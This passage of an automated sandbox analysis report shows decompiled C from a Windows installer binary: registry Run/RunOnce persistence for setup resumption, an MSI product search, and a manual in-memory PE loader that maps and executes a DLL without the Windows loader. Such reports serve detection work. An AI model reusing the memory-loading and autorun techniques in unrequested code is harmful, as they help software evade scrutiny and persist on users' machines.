                                                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                                  • API String ID: 2257214823-301359130
                                                                                                                                                                  • Opcode ID: 45178530e8b90370da7c386abbc1f53554d34c538defd580c7abe7c6eae14238
                                                                                                                                                                  • Instruction ID: 5754b5b5cbcd91b5cffeeff879ba8639794bd8195ec2fd4fd2ee263f156d034d
                                                                                                                                                                  • Opcode Fuzzy Hash: 45178530e8b90370da7c386abbc1f53554d34c538defd580c7abe7c6eae14238
                                                                                                                                                                  • Instruction Fuzzy Hash: 484191B2F40314ABEB10DBAA9D45BEFB6F8AF08744F114127FD05F7250D6798C408AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A0F6, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 132registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                                  			E0040A0F6(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				signed short _t35;
				long _t45;
				signed short _t46;
				void* _t52;
				intOrPtr _t60;
				signed short _t63;
				signed short _t66;

				_t53 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				E00436186(__ecx, __edx, __eflags,  &_v16,  &_v20);
				_t58 = _a8;
				_t52 =  >=  ? L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce" : L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
				if(_a8 == 0) {
					L6:
					__eflags = _a12 - 1;
					if(_a12 == 1) {
						goto L13;
					} else {
						goto L7;
					}
				} else {
					_t63 = E004329C8(_t58, L"Resume", _a12);
					if(_t63 >= 0) {
						__eflags = _a12 - 3;
						if(_a12 != 3) {
							goto L6;
						} else {
							_t63 = E004329C8(_t58, L"Installed", 1);
							__eflags = _t63;
							if(_t63 >= 0) {
								L7:
								__eflags = _a16;
								if(_a16 != 0) {
									L13:
									_t59 = _a4;
									_push(L"burn.runonce");
									_t35 = E00433CEA( &_v12, L"%ls /%ls",  *((intOrPtr*)(_a4 + 0x58)));
									__eflags = _t35;
									if(_t35 >= 0) {
										_t63 = E00432129( *((intOrPtr*)(_t59 + 0x4c)), _t52, 0x20006,  &_v8);
										__eflags = _t63;
										if(_t63 >= 0) {
											_t63 = E00432A16(_t53, _v8,  *((intOrPtr*)(_t59 + 0xc)), _v12);
											__eflags = _t63;
											if(_t63 < 0) {
												_push("Failed to write run key value.");
												goto L19;
											}
										} else {
											_push("Failed to create run key.");
											goto L19;
										}
									} else {
										_push("Failed to format resume command line for RunOnce.");
										goto L19;
									}
								} else {
									_t60 = _a4;
									_t63 = E004324D5( *((intOrPtr*)(_t60 + 0x4c)), _t52, 0x20006,  &_v8);
									__eflags = _t63 - 0x80070002;
									if(_t63 == 0x80070002) {
										L12:
										_t63 = 0;
									} else {
										__eflags = _t63 - 0x80070003;
										if(_t63 == 0x80070003) {
											goto L12;
										} else {
											_t45 = RegDeleteValueW(_v8,  *(_t60 + 0xc));
											__eflags = _t45 - 2;
											_t46 =  ==  ? 0 : _t45;
											__eflags = _t46;
											if(_t46 != 0) {
												__eflags = _t46;
												_t66 =  <=  ? _t46 : _t46 & 0x0000ffff | 0x80070000;
												__eflags = _t66;
												_t63 =  >=  ? 0x80004005 : _t66;
												E004300D9(0x80004005, "registration.cpp", 0x49c, _t63);
												_push("Failed to delete run key value.");
												goto L19;
											}
										}
									}
								}
							} else {
								_push("Failed to write Installed value.");
								goto L19;
							}
						}
					} else {
						_push("Failed to write Resume value.");
						L19:
						_push(_t63);
						E00430A57();
					}
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t63;
			}














                                                                                                                                                                  0x0040a0f6
                                                                                                                                                                  0x0040a100
                                                                                                                                                                  0x0040a103
                                                                                                                                                                  0x0040a106
                                                                                                                                                                  0x0040a109
                                                                                                                                                                  0x0040a11a
                                                                                                                                                                  0x0040a123
                                                                                                                                                                  0x0040a12b
                                                                                                                                                                  0x0040a130
                                                                                                                                                                  0x0040a173
                                                                                                                                                                  0x0040a173
                                                                                                                                                                  0x0040a177
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a132
                                                                                                                                                                  0x0040a140
                                                                                                                                                                  0x0040a144
                                                                                                                                                                  0x0040a150
                                                                                                                                                                  0x0040a154
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a156
                                                                                                                                                                  0x0040a163
                                                                                                                                                                  0x0040a165
                                                                                                                                                                  0x0040a167
                                                                                                                                                                  0x0040a179
                                                                                                                                                                  0x0040a179
                                                                                                                                                                  0x0040a17d
                                                                                                                                                                  0x0040a1f5
                                                                                                                                                                  0x0040a1f5
                                                                                                                                                                  0x0040a1f8
                                                                                                                                                                  0x0040a209
                                                                                                                                                                  0x0040a213
                                                                                                                                                                  0x0040a215
                                                                                                                                                                  0x0040a230
                                                                                                                                                                  0x0040a232
                                                                                                                                                                  0x0040a234
                                                                                                                                                                  0x0040a24b
                                                                                                                                                                  0x0040a24d
                                                                                                                                                                  0x0040a24f
                                                                                                                                                                  0x0040a251
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a251
                                                                                                                                                                  0x0040a236
                                                                                                                                                                  0x0040a236
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a236
                                                                                                                                                                  0x0040a217
                                                                                                                                                                  0x0040a217
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a217
                                                                                                                                                                  0x0040a17f
                                                                                                                                                                  0x0040a17f
                                                                                                                                                                  0x0040a194
                                                                                                                                                                  0x0040a196
                                                                                                                                                                  0x0040a19c
                                                                                                                                                                  0x0040a1f1
                                                                                                                                                                  0x0040a1f1
                                                                                                                                                                  0x0040a19e
                                                                                                                                                                  0x0040a19e
                                                                                                                                                                  0x0040a1a4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a1a6
                                                                                                                                                                  0x0040a1ac
                                                                                                                                                                  0x0040a1b4
                                                                                                                                                                  0x0040a1b7
                                                                                                                                                                  0x0040a1ba
                                                                                                                                                                  0x0040a1bc
                                                                                                                                                                  0x0040a1cb
                                                                                                                                                                  0x0040a1cd
                                                                                                                                                                  0x0040a1d5
                                                                                                                                                                  0x0040a1d7
                                                                                                                                                                  0x0040a1e5
                                                                                                                                                                  0x0040a1ea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a1ea
                                                                                                                                                                  0x0040a1bc
                                                                                                                                                                  0x0040a1a4
                                                                                                                                                                  0x0040a19c
                                                                                                                                                                  0x0040a169
                                                                                                                                                                  0x0040a169
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a169
                                                                                                                                                                  0x0040a167
                                                                                                                                                                  0x0040a146
                                                                                                                                                                  0x0040a146
                                                                                                                                                                  0x0040a256
                                                                                                                                                                  0x0040a256
                                                                                                                                                                  0x0040a257
                                                                                                                                                                  0x0040a25d
                                                                                                                                                                  0x0040a144
                                                                                                                                                                  0x0040a262
                                                                                                                                                                  0x0040a267
                                                                                                                                                                  0x0040a267
                                                                                                                                                                  0x0040a270
                                                                                                                                                                  0x0040a275
                                                                                                                                                                  0x0040a275
                                                                                                                                                                  0x0040a281

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436186: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 004361D3
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000002,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00020006,00000002,00401414,00000000,00000000,00000001), ref: 0040A1AC
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000002,?,00000001,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00020006,00000002,00000000,00000000,00000001,00000000), ref: 0040A275
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseDeleteValueVersion
                                                                                                                                                                  • String ID: %ls /%ls$Failed to create run key.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.runonce$registration.cpp
                                                                                                                                                                  • API String ID: 3279111520-3853666782
                                                                                                                                                                  • Opcode ID: ca0ef1381d18350a05bbdf74a352851e7b484bab5e77e07e019c07b1425052c7
                                                                                                                                                                  • Instruction ID: 38ab04e6d4e6819744f265b39e9affe5b73a65ce89c73ddae4fafb1396df3d89
                                                                                                                                                                  • Opcode Fuzzy Hash: ca0ef1381d18350a05bbdf74a352851e7b484bab5e77e07e019c07b1425052c7
                                                                                                                                                                  • Instruction Fuzzy Hash: 2841E332D40329FADF22AAA49D01BAE76B4AB04710F11417BFE00B6291D37D9D6096CE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001B680, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 350libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                  			E1001B680(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AEA0(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AEA0(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AEE0( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AEE0(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AEA0(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D1F0(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B360(_t239, _t326, _t327, _a4, _a8, _v84, _v76);
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B120(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001ABC0(_v76);
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B4F0(_v76);
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001ADE0(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A9C0(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}












































                                                                                                                                                                  0x1001b680
                                                                                                                                                                  0x1001b680
                                                                                                                                                                  0x1001b680
                                                                                                                                                                  0x1001b686
                                                                                                                                                                  0x1001b68d
                                                                                                                                                                  0x1001b6ab
                                                                                                                                                                  0x1001b6b4
                                                                                                                                                                  0x1001b6b9
                                                                                                                                                                  0x1001b6be
                                                                                                                                                                  0x1001b6ca
                                                                                                                                                                  0x1001b6d8
                                                                                                                                                                  0x1001b6ef
                                                                                                                                                                  0x1001b6fd
                                                                                                                                                                  0x1001b702
                                                                                                                                                                  0x1001b707
                                                                                                                                                                  0x1001b716
                                                                                                                                                                  0x1001b719
                                                                                                                                                                  0x1001b725
                                                                                                                                                                  0x1001b746
                                                                                                                                                                  0x1001b763
                                                                                                                                                                  0x1001b785
                                                                                                                                                                  0x1001b78e
                                                                                                                                                                  0x1001b791
                                                                                                                                                                  0x1001b7ac
                                                                                                                                                                  0x1001b7bf
                                                                                                                                                                  0x1001b7db
                                                                                                                                                                  0x1001b7c1
                                                                                                                                                                  0x1001b7ca
                                                                                                                                                                  0x1001b7ca
                                                                                                                                                                  0x1001b7e4
                                                                                                                                                                  0x1001b7e9
                                                                                                                                                                  0x1001b7e9
                                                                                                                                                                  0x1001b7a0
                                                                                                                                                                  0x1001b7a9
                                                                                                                                                                  0x1001b7a9
                                                                                                                                                                  0x1001b7f2
                                                                                                                                                                  0x1001b808
                                                                                                                                                                  0x1001b813
                                                                                                                                                                  0x1001b818
                                                                                                                                                                  0x1001b81e
                                                                                                                                                                  0x1001b848
                                                                                                                                                                  0x1001b84b
                                                                                                                                                                  0x1001b84e
                                                                                                                                                                  0x1001b855
                                                                                                                                                                  0x1001b886
                                                                                                                                                                  0x1001b897
                                                                                                                                                                  0x1001b89e
                                                                                                                                                                  0x1001b8ca
                                                                                                                                                                  0x1001b8dc
                                                                                                                                                                  0x1001b8e3
                                                                                                                                                                  0x1001b8ec
                                                                                                                                                                  0x1001b8f5
                                                                                                                                                                  0x1001b8fe
                                                                                                                                                                  0x1001b907
                                                                                                                                                                  0x1001b910
                                                                                                                                                                  0x1001b919
                                                                                                                                                                  0x1001b922
                                                                                                                                                                  0x1001b930
                                                                                                                                                                  0x1001b935
                                                                                                                                                                  0x1001b93a
                                                                                                                                                                  0x1001b95d
                                                                                                                                                                  0x1001b96f
                                                                                                                                                                  0x1001b97d
                                                                                                                                                                  0x1001b983
                                                                                                                                                                  0x1001b98d
                                                                                                                                                                  0x1001b9a0
                                                                                                                                                                  0x1001b9a5
                                                                                                                                                                  0x1001b9aa
                                                                                                                                                                  0x1001b9bc
                                                                                                                                                                  0x1001b9bf
                                                                                                                                                                  0x1001b9c2
                                                                                                                                                                  0x1001b9df
                                                                                                                                                                  0x1001b9c4
                                                                                                                                                                  0x1001b9cc
                                                                                                                                                                  0x1001b9d1
                                                                                                                                                                  0x1001b9d7
                                                                                                                                                                  0x1001b9d7
                                                                                                                                                                  0x1001b9ea
                                                                                                                                                                  0x1001b9ef
                                                                                                                                                                  0x1001b9f4
                                                                                                                                                                  0x1001b9ff
                                                                                                                                                                  0x1001ba04
                                                                                                                                                                  0x1001ba09
                                                                                                                                                                  0x1001ba14
                                                                                                                                                                  0x1001ba19
                                                                                                                                                                  0x1001ba1e
                                                                                                                                                                  0x1001ba2b
                                                                                                                                                                  0x1001ba87
                                                                                                                                                                  0x1001ba8e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba8e
                                                                                                                                                                  0x1001ba34
                                                                                                                                                                  0x1001ba7f
                                                                                                                                                                  0x1001ba82
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba82
                                                                                                                                                                  0x1001ba41
                                                                                                                                                                  0x1001ba4f
                                                                                                                                                                  0x1001ba56
                                                                                                                                                                  0x1001ba68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba68
                                                                                                                                                                  0x1001ba5d
                                                                                                                                                                  0x1001ba93
                                                                                                                                                                  0x1001ba97
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba20
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001ba0b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b9f6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b9ac
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b93c
                                                                                                                                                                  0x1001b8af
                                                                                                                                                                  0x1001b8b7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b8bd
                                                                                                                                                                  0x1001b868
                                                                                                                                                                  0x1001b86b
                                                                                                                                                                  0x1001b86e
                                                                                                                                                                  0x1001b875
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b879
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b87f
                                                                                                                                                                  0x1001b825
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b82b
                                                                                                                                                                  0x1001b76a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b770
                                                                                                                                                                  0x1001b74d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b753
                                                                                                                                                                  0x1001b72c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b732
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b709
                                                                                                                                                                  0x1001b6df
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001b6e5
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B69E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 1001B6A5
                                                                                                                                                                    • Part of subcall function 1001AEA0: SetLastError.KERNEL32(0000000D,?,1001B6B9,10020924,00000040), ref: 1001AEAD
                                                                                                                                                                  • SetLastError.KERNEL32(000000C1), ref: 1001B6DF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$AddressHandleModuleProc
                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                  • API String ID: 1762409328-192647395
                                                                                                                                                                  • Opcode ID: ae3fee445ec4d19d6ee5c2b7a83ae7a0f3ff5de58bc9d8d9499198fe1faa7369
                                                                                                                                                                  • Instruction ID: 694ab680ebfe8ef0636185c130ad71dc1cebcbc5687b108a2a2fd76037c7b5c4
                                                                                                                                                                  • Opcode Fuzzy Hash: ae3fee445ec4d19d6ee5c2b7a83ae7a0f3ff5de58bc9d8d9499198fe1faa7369
                                                                                                                                                                  • Instruction Fuzzy Hash: 0AE1F874A00609DFDB04CFA4C884AAEBBB1FF88305F648558E905AF385D774E982CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004060B6, Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 175COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E004060B6(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v20;
				signed int _v24;
				char _v28;
				void* _t36;
				void* _t42;
				intOrPtr _t43;
				void* _t54;
				void* _t55;
				void* _t60;
				void* _t62;
				void* _t70;
				void* _t71;
				intOrPtr* _t74;
				char* _t79;
				void* _t81;
				void* _t82;
				void* _t83;

				_t74 = _a4;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0;
				_v12 = 0;
				_t36 =  *((intOrPtr*)(_t74 + 0x10)) - 1;
				if(_t36 == 0) {
					_t79 = L"VersionString";
					L9:
					if(E00403A92(_a8,  *((intOrPtr*)(_t74 + 0x14)),  &_v8, 0) >= 0) {
						_v20 = 2;
						_t81 = E004352D2(0, _v8, _t79,  &_v28);
						if(_t81 != 0x80070648) {
							L14:
							if(_t81 != 0x80070645) {
								L21:
								if(_t81 >= 0) {
									_t42 =  *((intOrPtr*)(_t74 + 0x10)) - 1;
									if(_t42 == 0) {
										_push(3);
										L32:
										_pop(_t43);
										L33:
										_t82 = E00418B53( &_v28, _t43);
										if(_t82 >= 0) {
											_t82 = E0040465B(_a8,  *((intOrPtr*)(_t74 + 4)),  &_v28, 0);
											if(_t82 >= 0) {
												L39:
												if(_v8 != 0) {
													E004380AB(_v8);
												}
												E00418E52( &_v28);
												return _t82;
											}
											_push("Failed to set variable.");
											L37:
											_push(_t82);
											E00430A57();
											L38:
											_push(_t82);
											E00430F28(2, "MsiProductSearch failed: ID \'%ls\', HRESULT 0x%x",  *_t74);
											goto L39;
										}
										_push("Failed to change value type.");
										goto L37;
									}
									_t54 = _t42 - 1;
									if(_t54 == 0) {
										_push(2);
										goto L32;
									}
									_t55 = _t54 - 1;
									if(_t55 == 0 || _t55 == 1) {
										_t43 = 1;
									} else {
										_t43 = _v12;
									}
									goto L33;
								}
								_push("Failed to get product info.");
								goto L37;
							}
							E00430F28(2, "Product not found: %ls", _v8);
							_t83 = _t83 + 0xc;
							_t60 =  *((intOrPtr*)(_t74 + 0x10)) - 1;
							if(_t60 == 0) {
								L18:
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x18], xmm0");
								L19:
								_v20 = 1;
								L20:
								_t81 = 0;
								goto L21;
							}
							_t62 = _t60;
							if(_t62 == 0) {
								_v24 = _v24 & 0x00000000;
								_v28 = 2;
								goto L19;
							}
							if(_t62 != 1) {
								goto L20;
							}
							goto L18;
						}
						_push(_v8);
						E00430F28(3, "Trying per-machine extended info for property \'%ls\' for product: %ls", _t79);
						_t83 = _t83 + 0x10;
						_t81 = E00435361(0, _v8, 0, 4, _t79,  &_v28);
						if(_t81 != 0x80070645) {
							goto L21;
						}
						_push(_v8);
						E00430F28(2, "Trying per-user extended info for property \'%ls\' for product: %ls", _t79);
						_t83 = _t83 + 0x10;
						_t81 = E00435361(0, _v8, 0, 2, _t79,  &_v28);
						goto L14;
					}
					_push("Failed to format product code string.");
					goto L37;
				}
				_t70 = _t36 - 1;
				if(_t70 == 0) {
					_t79 = L"Language";
					goto L9;
				}
				_t71 = _t70 - 1;
				if(_t71 == 0) {
					_t79 = L"State";
					goto L9;
				}
				if(_t71 == 1) {
					_t79 = L"AssignmentType";
					goto L9;
				}
				_t82 = 0x80004001;
				E00430A57(0x80004001, "Unsupported product search type: %u",  *((intOrPtr*)(_t74 + 0x10)));
				_t83 = _t83 + 0xc;
				goto L38;
			}






















                                                                                                                                                                  0x004060bd
                                                                                                                                                                  0x004060c7
                                                                                                                                                                  0x004060c8
                                                                                                                                                                  0x004060c9
                                                                                                                                                                  0x004060ca
                                                                                                                                                                  0x004060d0
                                                                                                                                                                  0x004060d3
                                                                                                                                                                  0x004060d6
                                                                                                                                                                  0x004060d7
                                                                                                                                                                  0x00406112
                                                                                                                                                                  0x00406117
                                                                                                                                                                  0x0040612b
                                                                                                                                                                  0x0040613f
                                                                                                                                                                  0x0040614b
                                                                                                                                                                  0x00406153
                                                                                                                                                                  0x004061a9
                                                                                                                                                                  0x004061af
                                                                                                                                                                  0x004061e1
                                                                                                                                                                  0x004061e3
                                                                                                                                                                  0x004061fc
                                                                                                                                                                  0x004061fd
                                                                                                                                                                  0x00406216
                                                                                                                                                                  0x00406218
                                                                                                                                                                  0x00406218
                                                                                                                                                                  0x00406219
                                                                                                                                                                  0x00406223
                                                                                                                                                                  0x00406227
                                                                                                                                                                  0x00406241
                                                                                                                                                                  0x00406245
                                                                                                                                                                  0x00406266
                                                                                                                                                                  0x0040626a
                                                                                                                                                                  0x0040626f
                                                                                                                                                                  0x0040626f
                                                                                                                                                                  0x00406278
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406283
                                                                                                                                                                  0x00406247
                                                                                                                                                                  0x0040624c
                                                                                                                                                                  0x0040624c
                                                                                                                                                                  0x0040624d
                                                                                                                                                                  0x00406254
                                                                                                                                                                  0x00406254
                                                                                                                                                                  0x0040625e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406263
                                                                                                                                                                  0x00406229
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406229
                                                                                                                                                                  0x004061ff
                                                                                                                                                                  0x00406200
                                                                                                                                                                  0x00406212
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00406212
                                                                                                                                                                  0x00406202
                                                                                                                                                                  0x00406203
                                                                                                                                                                  0x0040620f
                                                                                                                                                                  0x00406208
                                                                                                                                                                  0x00406208
